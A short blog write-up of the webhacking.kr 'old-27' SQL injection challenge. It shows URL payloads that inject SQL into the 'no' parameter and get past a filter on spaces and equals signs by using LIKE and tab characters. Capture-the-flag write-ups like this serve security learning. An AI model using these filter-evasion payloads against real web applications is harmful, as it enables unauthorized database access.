Planet DesKel

DesKel's official page for CTF write-up, Electronic tutorial, review and etc.

5 September 2020

Webhacking.kr write-up: old-27

Link point tag
old-27 150 SQLi

Welcome back to another good SQLi challenge by webhacking.kr.

question

Let’s check the source code.

code

Look like we have some filters and SQL query on the script. Judging on the query, one might think the proper URL based SQLi payload should be like this

?no=2) or id='admin'--

Since the space character (x20) and equal (=) sign has been filtered out, we need to think another way. The possible way we are talking about is using the wildcard (LIKE) such that

?no=2) or no like 2--

Meanwhile the space character can be by passed using Tab key (x09)

?no=2)%09or%09no%09like%092--%09

Space after two dashes () is required for some SQL database

solve

tags: webhacking.kr - sqli

Thanks for reading. Follow my twitter for latest update

If you like this post, consider a small donation. Much appreciated. :)


Vortex


© 2020 DesKel